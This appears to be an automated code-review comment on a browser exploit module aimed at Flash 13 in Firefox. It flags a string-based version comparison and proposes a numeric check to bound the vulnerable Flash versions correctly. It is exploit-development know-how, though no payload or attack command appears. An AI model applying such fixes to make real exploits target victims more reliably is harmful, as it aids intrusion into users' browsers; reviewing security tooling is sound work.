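Review bot: `ver <= '13.0.0.182'` in the new `:flash` lambda compares version strings lexicographically, so a value such as `13.0.0.2` would be treated as newer than `13.0.0.182` while `13.0.0.1000` would be treated as older; the requirement therefore does not express the intended upper bound. Keep the `ver =~ /^13\./` guard so malformed values are rejected first and compare numerically, `(ver =~ /^13\./ && Gem::Version.new(ver) <= Gem::Version.new('13.0.0.182'))`. The other hunks in this section (description, disabled `InitialAutoRunScript`, `Cache-Control` header, `<embed>` tag) look consistent with the stated Firefox support.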